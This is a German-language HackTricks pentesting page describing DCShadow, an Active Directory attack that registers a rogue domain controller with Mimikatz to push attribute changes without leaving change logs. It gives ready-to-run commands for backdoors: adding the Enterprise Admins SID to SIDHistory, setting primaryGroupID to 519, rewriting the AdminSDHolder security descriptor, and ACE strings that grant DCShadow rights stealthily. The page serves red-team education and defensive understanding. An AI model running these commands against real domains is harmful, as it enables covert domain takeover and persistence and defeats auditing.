DCShadow

Unterstützen Sie HackTricks

DCShadow

Es registriert einen neuen Domänencontroller im AD und verwendet ihn, um Attribute (SIDHistory, SPNs...) an bestimmten Objekten ohne das Hinterlassen von Protokollen bezüglich der Änderungen zu pushen. Sie benötigen DA-Berechtigungen und müssen sich im Root-Domain befinden. Beachten Sie, dass bei Verwendung falscher Daten ziemlich hässliche Protokolle erscheinen werden.

Um den Angriff durchzuführen, benötigen Sie 2 Mimikatz-Instanzen. Eine davon startet die RPC-Server mit SYSTEM-Berechtigungen (hier müssen Sie die Änderungen angeben, die Sie durchführen möchten), und die andere Instanz wird verwendet, um die Werte zu pushen:

mimikatz1 (RPC-Server)
!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"
mimikatz2 (push) - Benötigt DA oder ähnliches
lsadump::dcshadow /push

Beachten Sie, dass elevate::token in der mimikatz1-Sitzung nicht funktioniert, da dies die Berechtigungen des Threads erhöht, wir jedoch die Berechtigung des Prozesses erhöhen müssen. Sie können auch ein "LDAP"-Objekt auswählen: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local

Sie können die Änderungen von einem DA oder von einem Benutzer mit diesen minimalen Berechtigungen vornehmen:

  • Im Domänenobjekt:

  • DS-Install-Replica (Replica in der Domäne hinzufügen/entfernen)

  • DS-Replication-Manage-Topology (Replikations-Topologie verwalten)

  • DS-Replication-Synchronize (Replikationssynchronisation)

  • Das Standorte-Objekt (und seine Kinder) im Konfigurationscontainer:

  • CreateChild und DeleteChild

  • Das Objekt des Computers, der als DC registriert ist:

  • WriteProperty (Nicht Schreiben)

  • Das Zielobjekt:

  • WriteProperty (Nicht Schreiben)

Sie können Set-DCShadowPermissions verwenden, um diese Berechtigungen einem unprivilegierten Benutzer zu geben (beachten Sie, dass dies einige Protokolle hinterlässt). Dies ist viel restriktiver als DA-Berechtigungen zu haben. Zum Beispiel: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose Das bedeutet, dass der Benutzername student1 beim Anmelden an der Maschine mcorp-student1 DCShadow-Berechtigungen über das Objekt root1user hat.

Verwendung von DCShadow zur Erstellung von Hintertüren

Set Enterprise Admins in SIDHistory to a user
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
Ändere PrimaryGroupID (füge Benutzer als Mitglied der Domänenadministratoren hinzu)
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
Ändern des ntSecurityDescriptor von AdminSDHolder (Vollzugriff für einen Benutzer gewähren)
#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>

Shadowception - Geben Sie DCShadow Berechtigungen mit DCShadow (keine modifizierten Berechtigungsprotokolle)

Wir müssen die folgenden ACEs mit der SID unseres Benutzers am Ende anhängen:

  • Am Domänenobjekt:

  • (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

  • (OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)

  • (OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

  • Am Angreifer-Computerobjekt: (A;;WP;;;UserSID)

  • Am Zielbenutzerobjekt: (A;;WP;;;UserSID)

  • Am Sites-Objekt im Konfigurationscontainer: (A;CI;CCDC;;;UserSID)

Um den aktuellen ACE eines Objekts zu erhalten: (New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl

Beachten Sie, dass Sie in diesem Fall mehrere Änderungen vornehmen müssen, nicht nur eine. Verwenden Sie also im mimikatz1-Sitzung (RPC-Server) den Parameter /stack mit jeder Änderung, die Sie vornehmen möchten. Auf diese Weise müssen Sie nur einmal /push verwenden, um alle gestapelten Änderungen auf dem Rouge-Server durchzuführen.

Weitere Informationen zu DCShadow auf ired.team.

Unterstützen Sie HackTricks

Last updated